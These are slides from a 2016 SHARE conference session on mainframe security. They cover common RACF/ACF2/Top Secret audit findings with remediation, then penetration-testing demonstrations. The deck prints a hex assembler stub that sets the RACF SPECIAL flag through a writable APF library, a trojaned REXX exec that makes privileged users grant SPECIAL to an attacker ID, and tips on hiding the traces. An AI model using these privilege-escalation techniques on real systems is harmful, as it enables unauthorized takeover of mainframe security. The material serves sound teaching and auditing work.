2016 share the three headed beast v4

www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/
Kerberos or Cerberus?
The Three Headed Monster of Mainframe Security,
Penetration Testing and Hacking
Brian Marshall, Mark Wilson &
Chad Rikansrud
Insert
Custom
Session
QR if
Desired.
#19708

www.share.org/sanan
tonio-eval
Agenda
The Top Five (or even Six) Assessment Findings
• Brian Marshall: Brian.Marshall@go2vanguard.com
How to exploit One or Two of them
• Mark Wilson: MarkW@rsmpartners.com
The Other World
• Chad Rikansrud: CRikansrud@gmail.com
Questions

www.share.org/sanan
tonio-eval
Introduction – Brian Marshall
● 20 years in Information Technology
● VP Research and Development for Vanguard Integrity Professionals
● Mainframe RACF specialist
● DOD DISA STIG specialist
● Father and Grandfather.
● Speaker at many events (ISACA, ISSA, SHARE, Vanguard)
● Short, but devilishly good looking. 

www.share.org/sanan
tonio-eval
TOP FIVE
TOP FIVE
TOP FIVE

www.share.org/sanan
tonio-eval
http://creativecommons.org/licenses/by-nc-nd/3.0/©
Finding
Explanation
Risk
Recommended
Best Practice and
Remediation
Started Task IDs are not Defined as PROTECTED in RACF,
RESTRICT in ACF2, or in the STC Record in Top Secret.
User IDs associated with started tasks should be defined as such which will will
exempt them from revocation due to inactivity or excessive invalid password attempts,
as well as being used to sign on to an application.
The ESM will allow the user ID to be used for the started task even if it has become
revoked, but some started tasks may either submit jobs to the internal reader that will
fail or may issue a RACROUTE REQUEST=VERIFY macro for the user ID that will
also fail.
Review all started task user IDs that are not protected. Determine if the user IDs are
used for any other function that might require a password. Define the started task
user IDs as “protected” for those tasks that do not require a password.
“Top Five” Assessment Finding #5

www.share.org/sanan
tonio-eval
Finding
Explanation
Risk
Recommended
Best Practice and
Remediation
Critical data sets with ‘global access’ greater than READ
The UACC value in RACF for a dataset profile defines the default level of access to
which any user whose user ID or a group to which it has been connected does not
appear in the access list. The ALL record in Top Secret contains data sets that have a
default level of access for all users. There is no equivalent in CA ACF2, everything
must be explicitly allowed.
Data sets that are protected by a ‘global access’ greater than READ will allow most
users with system access to modify critical data residing in these data sets. In addition,
users may be able to delete any data set covered by the dataset profiles that have
global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate.
For those profiles where access is excessive, you will have to determine who really
needs access before changing the ‘global access’. To find out who is accessing these
data sets, review SMF data to determine who is accessing the data sets with greater
than READ access.

www.share.org/sanan
tonio-eval
Finding
Explanation
Risk
Recommended
Best Practice and
Remediation
Sensitive Data Sets with ‘global access’ Greater than NONE
The UACC value in RACF for a dataset profile defines the default level of access to
which any user whose user ID or a group to which it has been connected does not
appear in the access list. The ALL record in Top Secret contains data sets that have a
default level of access for all users. There is no equivalent in CA ACF2, everything
must be explicitly allowed.
Data sets that are protected by ‘global access’ greater than NONE allow most users
with system access to read or modify these data sets. In addition, users may be able to
delete any data set covered by the dataset profiles that have global access defined.
Review each of these profiles and determine whether the ‘global access’ is appropriate.
For those profiles where access is excessive, you will have to determine who really
needs access before changing the ‘global access’. To find out who is accessing these
data sets, review SMF data to determine who is accessing the data sets with the ‘global
access’.

www.share.org/sanan
tonio-eval
Finding
Explanation
Risk
Remediation
Inappropriate Usage of z/OS UNIX Superuser Privilege, UID=0
User IDs with z/OS UNIX superuser authority, UID(0), have full access to all UNIX
directories and files and full authority to administer z/OS UNIX.
Since the UNIX environment is the z/OS portal for critical applications such as file transfers,
Web applications, and TCPIP connectivity to the network in general, the ability of these
superusers to accidentally or maliciously affect these operations is a serious threat. No
personal user IDs should be defined with an OMVS segment specifying UID(0).
The assignment of UID(0) authority should be minimized by managing superuser privileges
by granting access to one or more of the ‘BPX.qualifier’ profiles in the FACILITY class and/or
access to one or more profiles in the UNIXPRIV class.

www.share.org/sanan
tonio-eval
Finding
Explanation
Risk
Remediation
Excessive Number of User IDs with No Password Interval
User IDs with no password Interval are not required to change their passwords
Since passwords do not need to be changed periodically, people who knew a
password for an ID could still access that ID even if they are no longer authorized
users.
Review each of the personal user profiles to determine why they require no expiration.
Their passwords should adhere to the company policy regarding password changes.
If the user ID is being used for started tasks or surrogate, it should be reviewed and
changed to the appropriate ESM privilege.

www.share.org/sanan
tonio-eval
Finding
Explanation
Risk
Remediation
Excessive Access to APF Libraries
Authorized Program Facility (APF) libraries are in integral part of the z/OS architecture
to enable maintenance of the integrity of the z/OS operating system environment.
Libraries designated as APF allow programs to execute with the authority of z/OS itself,
so the ability to modify these libraries must be strictly controlled.
UPDATE or higher access to an APF library can allow an individual to create an
authorized program which can bypass security controls and execute privileged
instructions. UPDATE or higher access should be limited to senior systems support
staff.
Review the protection of all APF libraries and remove or change inappropriate access
list entries and ensure that all IUPDATE activity is logged to SMF.
©2015 Vanguard Integrity Professionals, Inc. All Rights Reserved. You have a limited license to view these materials for your organization’s internal
purposes. Any unauthorized reproduction, distribution, exhibition or use of these copyrighted materials is expressly prohibited.
“The Worst” Assessment Finding

www.share.org/sanan
tonio-eval
Top Ten Critical Assessment Findings in
Mainframe Environments
74% Excessive Number of User ID’s with no Password Interval SEVERE
60% Inappropriate Usage of z/OS UNIX Superuser Privilege, UID = 0 SEVERE
54% Sensitive Data Sets with ‘global access’ Greater than NONE SEVERE
54% Critical Data Sets with ‘global access’ Greater than READ HIGH
53% Started Task IDs are not Defined as ‘protected’ IDs HIGH
52% Improper Use or Lack of UNIXPRIV Profiles HIGH
44% Excessive Access to the SMF Data Sets HIGH
42% Excessive Access to APF Libraries SEVERE
42% Excessive Access to z/OS UNIX File System Data Sets HIGH
40% ESM Database(s) is not Adequately Protected SEVERE
10/14/15

www.share.org/sanan
tonio-eval
Time to handover to …...

www.share.org/sanan
tonio-eval
Introduction – Mark Wilson
● Technical Director at RSM Partners
● Been in IT for over 36 Years….
● I lead the Technical team at RSM that amounts to just over 60
technicians….yes it’s a lot of fun!!...most of the time
● IT Security in particular mainframes is my specialist subject

www.share.org/sanan
tonio-eval
Getting the language right
● Penetration Testing
– Done by the good people out there to stop the bad folks
getting in
– This is the bit I enjoy the most
● Hacking
– The bad guys or gals…… its not necessarily a male
dominated activity these days
– They are after our stuff….

www.share.org/sanan
tonio-eval
● Vulnerability Scanning
– Scanning the code delivered by IBM and ISV’s along with any
code you may have developed yourself
– Test the code to see if it has any vulnerabilities that could be
exploited by a knowledgably user

www.share.org/sanan
tonio-eval
● Auditing
– The process of checking that we are doing everything
correctly
– These are the good guys and are here to help
– Work with them not against them
– Educate them, don’t shun them…we all had to start
somewhere
– How many IT Auditors actually understand what we do?

www.share.org/sanan
tonio-eval
Poorly protected APF lib’s
● Very simple exploit
● It not uncommon to find hundreds of users having update access
to APF authorised libraries……
● What's most alarming is that the client site(s) typically has 10 or
less system programmers
● Having update authority to an APF authorised library means I can
write my own authorised code and run it undetected 

www.share.org/sanan
tonio-eval
Poorly protected APF lib’s
● May ways to find the list of APF Authorised libraries
– ISRDDN, IPLINFO REXX Exec, TASID, etcOr write your own
● TSO ISRDDN
– APF
– ONLY APF
– MEM FRED
● TSO IPLINFO APF – If you have installed IPLINFO REXX

www.share.org/sanan
tonio-eval
Excessive Access to APF Libraries
● Once you have found an APF library you can update…
● Then the following manual sometimes can help 

www.share.org/sanan
tonio-eval
Just a Bit of Code… Honest 
A START
DC
X'411000300A6B58F0021CBFFFF154A774000858F0022458FF006
C58FF00C896'
DC X'80F02617FF07FE'
END A

www.share.org/sanan
tonio-eval
Now the good bit!
● Assemble and linkedit the code shown with AC(1)
● Place in an APF library with any name you want (LURACF)
● Run the program as a two step batch job…
– The first to call this program (PGM=LURACF)
– The second to issue any RACF command you want!

www.share.org/sanan
tonio-eval
Now the good bit!
● Why/How does this work?
● Well that little bit of code flipped a flag in my ACEE to turn on the
RACF SPECIAL flag for my instorage ACEE
● This can be modified so that it looks very innocent, e.g. part of a
translate table, or it can be rewritten in a virus-type manner,
making it more difficult to disassemble

www.share.org/sanan
tonio-eval
Lets do it!

www.share.org/sanan
tonio-eval
CLIST/REXX Issues
● We quite often see CLIST/REXX Libraries that are universally
updateable that are not at the bottom of the list of concatenated
datasets for SYSPROC or SYSEXEC
● Simply find an exec that is lower down in the concatenation that
is used by one of the privileged users (Sec Admin, Sysprog, etc)
● Copy an exec to the universally accessible dataset and add a bit
of your own code 

www.share.org/sanan
tonio-eval
CLIST/REXX Issues
● An Example
● When doing a Pen test we determined that we had UPDATE
authority to a CLIST/REXX Library allocated and used each time
we logged on to TSO…the dataset was called USER.CLIST
● Add to this the fact that
– All users via their Logon Proc call the same exec WBA001
● A simple update to WBA001 to call a little piece of code….
● And then just sit and wait….

www.share.org/sanan
tonio-eval
CLIST/REXX Issues
Added this line
here

www.share.org/sanan
tonio-eval
CLIST/REXX Issues
The contents of USER.CLIST(MYCMD)
/* REXX */
/***************************************************/
/* Trap the responses so no messages issued to the */
/* user as they logon…. */
/***************************************************/
TEMP = OUTTRAP(LINE.)
/* is this the user I want to exploit?? */
UID =sysvar(sysuid)
/* If so get THEM to issue the command you want */
IF UID = CHAD or BRIAN then do
address tso alu MY_HACKER_ID SPECIAL OPERATIONS
End
Could use a
prefix (SUBSTR)
for a group of
users!

www.share.org/sanan
tonio-eval
CLIST/REXX Issues
● So why pick on CHAD or BRIAN?
– We determined from looking at the syslog and output on the
Q that CHAD and BRIAN were RACF SYSTEM SPECIAL
● So the next time either of them logs onto the system any
command entered into mycmd is run…game over….
● I can even cover my tracks my resetting the ISPF stats to show
another userid having last changed WBA001 and MYCMD
● Imagine if I changed it to CHAD or BRIAN!!

www.share.org/sanan
tonio-eval
Introduction – Chad Rikansrud
• 20 Years in Information Technology
• Networking Protocols / Forensics
• Programming (Assembler, C, Python, others)
• Security & Security Research (z/OS, x86_64)
– Contributor to open source projects:
• Metasploit, r2 disassembly framework, scrypt
• Cryptography implementations / protocols
• Capture the Flag builder (BSides DFW,MSP)
• Speaker at DEF CON, Derbycon, MN SEC, Others

www.share.org/sanan
tonio-eval
How the bad guys think
● Let’s assume 3 types of attackers:
– No mainframe knowledge, but skilled at exploits / other OS’s
– Some mainframe knowledge, also skilled at other OS’s
– Mainframe knowledge + hacking skills
● Look at 3 possible attacks (based on the above)
– JAVA deserialization / poor configuration (works out of the box)
– Scrape credentials (Clear or Self-Signed Cert) – use to submit remote JCL
– SMP/E injection & Forgery

www.share.org/sanan
tonio-eval
Attack #1 - JAVA
Java
• Gift that keeps giving
• Combination of inherent vulnerabilities (Fixed with patching
SMP/E, etc) and poorly written code.
• Deserialization attacks (Common Libraries / Bad code)
• Java takes care of the Code Page issues (Good for you/Good for
them!)
Java Exploit Demo

www.share.org/sanan
tonio-eval

www.share.org/sanan
tonio-eval
Attack #2 – JCL over FTP w/Stolen Creds
JCL over FTP
• Fantastic way to remotely exploit system with given creds.
• How to get creds (Sniff wire, MITM Self-Signed Cert).
• How to submit reliable JCL over FTP (Metasploit)
• What to submit? (Shells, pull password database, etc.)
JCL over FTP demo

www.share.org/sanan
tonio-eval
Attack #3 – SMP/E Forgery
SMP/E
• Lots of controls around RACF authorization for SMP/E commands
• What about the Files / Libraries?
• OMVS /smpnts directory?
• z/OS SMPPTS libraries
• Global / Target / Distribution zones
• Insert code to build Load Module / Replace an Exit / Backdoor ?
SMP/E Forgery Demo

www.share.org/sanan
tonio-eval
Summary - Attacks
● Don’t presume that attacks built for ‘nix / Windows can’t be
repurposed
– Sometimes they work out of the box
– Occasionally require a little retooling / build tools to make
easier
– Some work in theory – but require in depth knowledge.
– All can make your life miserable

www.share.org/sanan
tonio-eval
Summary - Attacks
● Remediation
– Secure your SMP/E libraries (See Brian’s notes on insecure
libraries)
– Lock down FTP configuration.
– Strong Passwords + 2-factor authentication < - - - - - This
mitigates many issues.
– Secure coding training / practice. (Esp. Java

www.share.org/sanan
tonio-eval
Questions

www.share.org/sanan
tonio-eval
Related Sessions
Session # Session Title Date and Time Room Speaker(s)
19683 RACF Monitoring & Reporting 2016-08-02, 12:30:00 L402 Robert S. Hansel
19639 RACF Update 2016-08-03, 08:30:00 L401 Mark Nelson, Julie A. Bergh
19638 CA ACF2 & CA Top Secret Update - R16 is Finally Here! 2016-08-03, 10:00:00 L401 Carla Flores
19612
HiperSockets: Capabilities, z/OS Config, Comparison to OSA, RoCE and SMC-D, and
Routing to Linux on z 2016-08-03, 11:15:00 A601 Linda Harrison
19646
RACF IRRXUTIL, System REXX, and the IBM Health Checker for z/OS: A Perfect
Combination! 2016-08-03, 13:45:00 L402 Mark Nelson, Julie A. Bergh
19782 Experiences with Two Factor Authentication (2FA) on z/OS 2016-08-03, 15:15:00 A704 Gary Morgan, Steve Brinkley
19464 Encryption? Yeah, We Do That 2016-08-04, 10:00:00 L505 Phil Smith III
19389 Can CICS Be Hacked? Are Yesterday's Practices Today's Exposure? 2016-08-04, 10:00:00 A602 Leigh Compton
19655
Preparing for a Security Audit? Introducing Key Tracking, Key Validity and Key
Archival Using ICSF (Integrated Cryptographic Service Facility) 2016-08-04, 13:45:00 A601 Eysha Shirrine Powers
19241 z/OS Communications Server Security Using Policy Agent 2016-08-04, 13:45:00 L401 Linda Harrison
19804 PAGENT & RACF: Security from within the Black Box and Beyond 2016-08-04, 16:30:00 L508 Brian Marshall, Marlaina Chirdon
19239 Safe and Secure Transfers with z/OS FTP 2016-08-04, 16:30:00 L402 Chris Meyer; Sam Reynolds
19424 A New Look at Mainframe Hacking and Penetration Testing 2016-08-05, 08:30:00 L402 Mark Wilson
19765
SHARE Live! - High Expectations: Our Systems Are (or Could Be) as Secure as
Airplanes 2016-08-05, 11:15:00 A702 Mark Nelson

www.share.org/sanan
tonio-eval
Thank You for Attending!
Please remember to complete your evaluation
in the SHARE mobile app.
#19708

2016 share the three headed beast v4

Recommended

Recommended

More Related Content

Viewers also liked

Viewers also liked (20)

Similar to 2016 share the three headed beast v4

Similar to 2016 share the three headed beast v4 (20)

Recently uploaded

Recently uploaded (20)

2016 share the three headed beast v4